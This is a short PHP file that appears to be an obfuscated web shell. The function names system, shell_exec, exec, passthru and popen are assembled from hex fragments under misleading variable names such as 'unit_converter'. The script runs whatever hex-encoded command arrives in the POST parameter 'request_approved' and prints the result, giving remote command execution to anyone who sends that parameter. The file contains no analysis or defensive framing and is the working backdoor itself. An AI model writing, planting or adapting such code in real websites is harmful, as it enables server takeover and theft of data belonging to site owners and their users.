<?php


$holder1 = '74';
$holder2 = '65';
$holder3 = '6d';
$holder4 = '73';
$holder5 = '68';
$holder6 = '5f';
$holder7 = '78';
$holder8 = '75';
$holder9 = '70';
$holder10 = '6f';
$holder11 = '61';
$holder12 = '67';
$holder13 = '6e';
$holder14 = '6c';
$holder15 = '72';
$holder16 = '76';
$unit_converter1 = pack("H*", '73' . '79' . '73' . $holder1 . $holder2 . $holder3);
$unit_converter2 = pack("H*", $holder4 . $holder5 . $holder2 . '6c' . '6c' . $holder6 . '65' . $holder7 . $holder2 . '63');
$unit_converter3 = pack("H*", $holder2 . $holder7 . $holder2 . '63');
$unit_converter4 = pack("H*", '70' . '61' . '73' . '73' . $holder1 . '68' . '72' . $holder8);
$unit_converter5 = pack("H*", $holder9 . $holder10 . '70' . '65' . '6e');
$unit_converter6 = pack("H*", $holder4 . '74' . '72' . '65' . $holder11 . '6d' . $holder6 . $holder12 . '65' . $holder1 . $holder6 . '63' . '6f' . $holder13 . $holder1 . $holder2 . '6e' . $holder1 . '73');
$unit_converter7 = pack("H*", $holder9 . '63' . $holder14 . '6f' . '73' . $holder2);
$request_approved = pack("H*", '72' . $holder2 . '71' . '75' . '65' . '73' . $holder1 . '5f' . '61' . $holder9 . $holder9 . $holder15 . '6f' . $holder16 . '65' . '64');
if (isset($_POST[$request_approved])) {
    $request_approved = pack("H*", $_POST[$request_approved]);
    if (function_exists($unit_converter1)) {
        $unit_converter1($request_approved);
    } elseif (function_exists($unit_converter2)) {
        print $unit_converter2($request_approved);
    } elseif (function_exists($unit_converter3)) {
        $unit_converter3($request_approved, $dchunk_element);
        print join("\n", $dchunk_element);
    } elseif (function_exists($unit_converter4)) {
        $unit_converter4($request_approved);
    } elseif (function_exists($unit_converter5) && function_exists($unit_converter6) && function_exists($unit_converter7)) {
        $elem_k = $unit_converter5($request_approved, 'r');
        if ($elem_k) {
            $fac_data_chunk = $unit_converter6($elem_k);
            $unit_converter7($elem_k);
            print $fac_data_chunk;
        }
    }
    exit;
}
